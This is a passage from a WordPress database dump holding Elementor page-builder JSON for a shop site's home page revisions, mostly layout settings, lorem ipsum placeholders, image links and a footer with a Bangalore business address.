",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8558,1495,'_elementor_page_assets','a:0:{}'),(8560,1496,'_elementor_edit_mode','builder'),(8561,1496,'_elementor_template_type','wp-page'),(8562,1496,'_elementor_version','3.7.7'),(8563,1496,'_wp_page_template','elementor_canvas'),(8564,1496,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8565,1496,'_elementor_page_assets','a:0:{}'),(8568,1497,'_elementor_edit_mode','builder'),(8569,1497,'_elementor_template_type','wp-page'),(8570,1497,'_elementor_version','3.7.7'),(8571,1497,'_wp_page_template','elementor_canvas'),(8572,1497,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\